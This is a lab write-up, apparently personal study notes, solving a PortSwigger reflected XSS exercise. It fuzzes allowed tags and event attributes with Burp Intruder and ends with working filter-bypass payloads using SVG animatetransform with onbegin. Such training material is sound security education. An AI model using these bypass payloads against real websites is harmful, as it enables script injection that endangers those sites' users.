Trigger `alert(1)` using a reflected XSS vector where most HTML/JS tags and attributes are [**blocked by server-side filtering**, **except for specific SVG elements and event attributes**](https://portswigger.net/web-security/cross-site-scripting/contexts/lab-some-svg-markup-allowed).
```
<img src=1 onerror=alert(1)>
```
Thats the base, lest think how we can cause that.
##### Strategy: Test to Find What Works
#### **Step 1: Tag Fuzzing with Burp Intruder**
1. Replace payload: `<§§>`
2. Load XSS tag list (from [PortSwigger cheat sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet))
3. Start attack
![[CleanShot 2025-04-09 at 19.13.46.png]]
**Observation:**
|Tag|Status|
|---|---|
|`<script>`|❌ Blocked (400)|
|`<img>`|❌ Blocked (400)|
|`<svg>`|✅ Allowed (200)|
|`<animatetransform>`|✅ Allowed (200)|
|`<title>`, `<image>`|✅ Allowed (200)|
**→ Only certain SVG tags bypass the filter**
![[CleanShot 2025-04-09 at 19.17.23.png]]
Investigate:
![[CleanShot 2025-04-09 at 19.18.58.png]]
#### **Step 2: Attribute Fuzzing with Allowed Tag**
1. Replace payload with: `<svg><animatetransform §§=1>`
2. Load list of SVG-friendly event attributes (e.g. `onbegin`, `onload`, `onend`, etc.)
3. Start attack
![[CleanShot 2025-04-09 at 19.20.49.png]]
**Observation:**
|Attribute|Status|
|---|---|
|`onload`, `onclick`|❌ Blocked (400)|
|`onbegin`|✅ Allowed (200)|
**→ `onbegin` can be used for code execution**
![[CleanShot 2025-04-09 at 19.20.26.png]]
---
##### Final Payload
**Working XSS vector:**
```html
<svg><animatetransform onbegin=alert(1)>
```
**Or the one from cheatsheet:**
```html
<svg><animatetransform onbegin=alert(1) attributeName=transform>
```
✅ Works with or **without** the `attributeName`
✅ **No user interaction** required
✅ Executed immediately during SVG parsing/rendering
#### Why It’s Beautiful (and Dangerous)
- The payload **completely bypasses filters** for `<script>`, `<img>`, `onerror`, etc.
- **SVG is parsed by a separate engine** in the browser, with unique tag/event combinations (like `onbegin`)
- **Browser decodes URL-encoded payloads** as part of DOM injection, no need to pre-decode
- Even without animation being "visibly active", certain tags like `<animatetransform>` **trigger lifecycle events** that can be hijacked